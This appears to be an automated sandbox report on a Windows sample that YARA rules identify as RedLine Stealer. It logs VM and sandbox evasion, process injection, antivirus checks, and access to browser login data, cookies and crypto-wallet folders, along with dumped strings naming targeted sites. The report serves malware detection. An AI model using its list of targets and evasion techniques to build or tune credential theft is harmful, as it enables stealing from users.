Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Memory allocated: 2620000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Memory allocated: 2870000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Memory allocated: 2620000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Memory allocated: 4E10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Memory allocated: 5E10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Memory allocated: 5F40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Memory allocated: 6F40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Memory allocated: 72D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Memory allocated: 82D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Memory allocated: 92D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Memory allocated: 2F30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Memory allocated: 2FA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Memory allocated: 4FA0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3088 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 787 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Window / User API: threadDelayed 2584 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Window / User API: threadDelayed 7148 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8456 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8416 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe TID: 8512 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe TID: 8484 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe TID: 8704 Thread sleep time: -33204139332677172s >= -30000s Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: tmp7265.tmp.3.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: tmp7265.tmp.3.dr Binary or memory string: discord.comVMware20,11696428655f
Source: tmp7265.tmp.3.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: tmp7265.tmp.3.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: tmp7265.tmp.3.dr Binary or memory string: global block list test formVMware20,11696428655
Source: tmp7265.tmp.3.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: tmp7265.tmp.3.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: VZCXGHSDSD.exe, 00000003.00000002.1481261655.00000000011BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
Source: tmp7265.tmp.3.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: tmp7265.tmp.3.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: tmp7265.tmp.3.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: tmp7265.tmp.3.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: tmp7265.tmp.3.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: tmp7265.tmp.3.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: tmp7265.tmp.3.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: tmp7265.tmp.3.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: VZCXGHSDSD.exe, 00000002.00000002.1324130932.00000000009FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tmp7265.tmp.3.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: tmp7265.tmp.3.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: tmp7265.tmp.3.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: tmp7265.tmp.3.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: tmp7265.tmp.3.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: tmp7265.tmp.3.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: tmp7265.tmp.3.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: tmp7265.tmp.3.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: tmp7265.tmp.3.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: tmp7265.tmp.3.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: tmp7265.tmp.3.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: tmp7265.tmp.3.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: tmp7265.tmp.3.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: tmp7265.tmp.3.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: tmp7265.tmp.3.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: tmp7265.tmp.3.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Memory written: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe "C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process created: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe "C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Queries volume information: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Queries volume information: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: VZCXGHSDSD.exe, 00000003.00000002.1496851508.00000000068A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.28ffc68.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.4099590.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.29044b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.28ffc68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.VZCXGHSDSD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.29044b8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.4099590.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.1480927097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1330376208.0000000004079000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1329670167.00000000028FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1482861241.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1330376208.0000000004099000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: VZCXGHSDSD.exe PID: 8464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: VZCXGHSDSD.exe PID: 8552, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: VZCXGHSDSD.exe, 00000002.00000002.1330376208.0000000004079000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ElectrumRule
Source: VZCXGHSDSD.exe, 00000002.00000002.1330376208.0000000004079000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: JaxxxLibertyAfihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: VZCXGHSDSD.exe, 00000002.00000002.1329670167.00000000028FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: VZCXGHSDSD.exe, 00000002.00000002.1330376208.0000000004079000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ExodusRule
Source: powershell.exe, 00000000.00000002.1312375251.00000000073D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe File opened: C:\Users\user\AppData\Roaming\atomic\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe File opened: C:\Users\user\AppData\Roaming\Guarda\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.28ffc68.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.4099590.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.29044b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.28ffc68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.VZCXGHSDSD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.29044b8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.4099590.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.1480927097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1330376208.0000000004079000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1329670167.00000000028FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1330376208.0000000004099000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: VZCXGHSDSD.exe PID: 8464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: VZCXGHSDSD.exe PID: 8552, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.28ffc68.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.4099590.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.29044b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.28ffc68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.VZCXGHSDSD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.29044b8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.VZCXGHSDSD.exe.4099590.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.1480927097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1330376208.0000000004079000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1329670167.00000000028FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1482861241.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1330376208.0000000004099000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: VZCXGHSDSD.exe PID: 8464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: VZCXGHSDSD.exe PID: 8552, type: MEMORYSTR
